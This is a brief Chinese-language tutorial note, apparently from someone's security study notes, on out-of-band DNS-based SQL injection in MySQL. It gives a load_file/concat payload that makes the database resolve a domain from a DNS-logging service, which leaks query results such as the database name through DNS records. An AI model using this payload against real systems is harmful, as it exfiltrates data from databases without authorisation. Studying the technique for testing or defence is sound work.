SQL注入:DNS注入
dns注入
payload: select load_file(concat(“\\\\",payload,".域名\\a");
具体步骤:
在http://www.dnslog.cn该网站上取得一个域名,在file_priv是空的情况下,使用上面的payload,load_file会自动去尝试解析该域名,解析的过程中它会在各个dns服务器中留下记录,这个记录就会把payload中的值给暴露出来,而我们这个网站里会记录下他给你的域名dns记录,在那个记录里面就会看见payload返回值了
test是我的库名,可见已经被爆出来了